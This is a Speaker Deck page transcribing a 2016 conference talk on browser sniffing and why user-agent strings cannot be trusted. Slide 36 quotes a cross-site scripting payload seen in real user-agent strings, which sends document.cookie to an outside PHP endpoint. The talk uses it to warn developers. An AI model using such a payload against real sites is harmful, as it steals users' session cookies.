Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Everybody Lies @ Fronteers Jam Sessions 2016

Niels Leenheer
October 06, 2016
Technology
1
140

Everybody Lies @ Fronteers Jam Sessions 2016

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

October 06, 2016
Tweet

More Decks by Niels Leenheer

See All by Niels Leenheer
Fun with Bluetooth @ Frontend United
nielsleenheer
1
84
Fun with Bluetooth @ Amsterdam JSNation
nielsleenheer
1
110
Fun with Bluetooth @ JSConf Belgium
nielsleenheer
0
68
Fun with Bluetooth @ DevDays Vilnius
nielsleenheer
0
120
Fun with Bluetooth @ Universal JS Day
nielsleenheer
0
320
Fun with Bluetooth @ Amsterdam University of Applied Sciences
nielsleenheer
0
39
Fun with Bluetooth @ FrontendNE 2018
nielsleenheer
0
160
Fun with Bluetooth @ DevFestNL
nielsleenheer
0
130
Fun with Bluetooth @ Halfstack
nielsleenheer
0
82

Other Decks in Technology

See All in Technology
asken リアーキテクチャを行う背景と DDD導入戦略
murahigeas
1
140
重厚長大な企業の内製開発組織で成果を出すためのサーバーレスアーキテクチャ / ServerlessDays Tokyo 2023
mongolyy
3
140
1人目の専任SREがポストモーテム文化を改善したらエンジニア以外にも広まり、 他部門との連携も強化された話+
tk3fftk
0
420
Jetpack Glanceではじめる Material 3のColor
mochico
1
570
そのとき歴史は動かなかった 〜 JTCのウォーターフォール研究者がバックログを発明した日〜
bonotake
0
290
Goで実装された高速な
仮想待合室サーバの実装と詳解
pyama86
13
5.6k
DDD e Team Topologies como estes conceitos podem te dar pistas de como montar seus times de engenharia!!!
claudioed
2
260
Material 3 やめました / Good-bye M3 design system
yanzm
3
2.3k
KubernetesにおけるSBOMを利用した脆弱性管理/Vulnerability_Management_with_SBOM_in_Kubernetes
takumakume
0
310
著作権とは何か?〜初歩的概念から権利利用法、侵害要件まで
line_developers
PRO
5
790
DevOpsDays Taipei 2023 行前攻略
devopstaiwan
0
130
How to test GraphQL API using Postman
yokawasa
0
330

Featured

See All Featured
Art, The Web, and Tiny UX
lynnandtonic
285
18k
Why You Should Never Use an ORM
jnunemaker
PRO
49
8.2k
Designing for Performance
lara
601
66k
Code Review Best Practice
trishagee
53
13k
It's Worth the Effort
3n
179
27k
Music & Morning Musume
bryan
37
5k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
17
1.3k
StorybookのUI Testing Handbookを読んだ
zakiyama
9
3.9k
The Power of CSS Pseudo Elements
geoffreycrofte
56
4.6k
Rails Girls Zürich Keynote
gr2m
90
12k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
26
5.5k
Fashionably flexible responsive web design (full day workshop)
malarkey
395
64k

Transcript

  1. the 8 minute version that contains 

    none of that boring shit and just 

    the jokes and weird stuff
    everybody lies
    fronteers conference — jam sessions, october 6th 2016

    View Slide

  2. this talk is full of 

    lies and deception
    warning:

    View Slide

  3. View Slide

  4. yes…
    this talk is about
    browser sniffing

    View Slide

  5. why?

    View Slide

  6. browser sniffing is 

    dirty

    View Slide

  7. you should use 

    feature detection

    View Slide

  8. Dear Web Developers:
    Browser Sniffing is Stupid
    http:/
    /www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

    View Slide

  9. 5 Reasons Why Browser
    Sniffing Stinks
    https:/
    /www.sitepoint.com/why-browser-sniffing-stinks/

    View Slide

  10. everybody uses 

    browser sniffing

    View Slide

  11. View Slide

  12. why…
    is browser sniffing 

    so difficult?

    View Slide

  13. things started out simple

    View Slide

  14. Mosaic/0.9
    Mosaic

    View Slide

  15. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    code name of 

    the browser

    View Slide

  16. but it quickly started 

    to get complicated

    View Slide

  17. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    compatible with 

    Netscape Navigator 1.0

    View Slide

  18. Opera/10.00 (Windows NT 5.1; U; en) 

    Presto/2.2.0
    Opera

    View Slide

  19. Opera/9.8 (Windows NT 5.1; U; en) 

    Presto/2.2.0 Version/10.00
    Opera
    real version of

    the browser

    View Slide

  20. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en; rv:1.9.1) 

    Gecko/20090624 Firefox/3.5
    Firefox
    build date of

    the rendering engine

    View Slide

  21. Mozilla/5.0 (Windows NT 6.0; rv:2.0) 

    Gecko/20100101 Firefox/4.0
    Firefox
    build date is no 

    longer updated

    View Slide

  22. Mozilla/5.0 (Windows NT 6.0; rv:16.0) 

    Gecko/16.0 Firefox/16.0
    Firefox

    View Slide

  23. and it gets worse…

    View Slide

  24. Mozilla/5.0 

    (Macintosh; U; PPC Mac OS X 10_4_11; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Version/3.2.3 Safari/525.28.3
    Safari

    View Slide

  25. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Chrome/15.0.874.120 Safari/525.28.3
    Chrome

    View Slide

  26. Mozilla/5.0 

    (Windows NT 10.0; WOW64) 

    AppleWebKit/537.36 (KHTML, like Gecko) 

    Chrome/44.0.2403.155 Safari/537.36 

    OPR/31.0.1889.180
    Opera

    View Slide

  27. Mozilla/5.0 

    (Windows NT 6.3; Trident/7.0; rv:11.0) 

    like Gecko
    Internet Explorer

    View Slide

  28. Mozilla/5.0 (Windows NT 10.0)

    AppleWebKit/537.36 (KHTML, like Gecko)

    Chrome/42.0.2311.135 Safari/525.28.3 

    Edge/12.10162
    Edge

    View Slide

  29. and those were all relatively
    normal user-agent strings

    View Slide

  30. sometimes browsers lie to 

    hide their true identity

    View Slide

  31. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera

    View Slide

  32. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    ROT 13 encrypted

    “mobi“

    View Slide

  33. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer

    View Slide

  34. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s 

    Internet Explorer 9

    View Slide

  35. and it is possible to change the
    user-agent string yourself

    View Slide

  36. alert("My Little Pony");
    document.location= 
<br/>"http://www.max1094.18.lc/admin/cookies.php?c=" + 
<br/>document.cookie;
    alt="My Little Pony">
    XSS attacks

    View Slide

  37. XSS attacks

    View Slide


  38. (╯°□°)╯︵ ┻━┻


    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    funny people

    View Slide

  39. angry people

    View Slide

  40. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 

    FuckYou/123.0 FuckingFox/321.0


    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 

    Presto/2.10.229 Version/11.62


    Seriously, Go fuck yourself


    W3C standards are important. 

    Stop fucking obsessing over user-agent already.
    angry people

    View Slide

  41. 1.000.000

    unique

    useragent
    strings

    View Slide

  42. 1.000.000

    unique

    useragent
    strings
    82 x fuck

    View Slide

  43. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass

    View Slide

  44. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass
    3 x vagina

    View Slide

  45. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    6 x ass
    3 x vagina
    108 x sex

    View Slide

  46. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    3 x vagina
    108 x sex

    View Slide

  47. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex

    View Slide

  48. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

    View Slide

  49. user-agent strings 

    cannot be trusted!

    View Slide

  50. everybody lies

    View Slide

  51. use browser sniffing for
    controlling access to 

    your website
    you should never

    View Slide

  52. you should never
    use browser sniffing for
    determining browser
    capabilities

    View Slide

  53. you should never
    build your own 

    browser sniffing library


    View Slide

  54. View Slide

  55. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  56. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  57. — Adolf Hitler
    “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”

    View Slide

  58. thank you!

    View Slide

  59. thank you!

    View Slide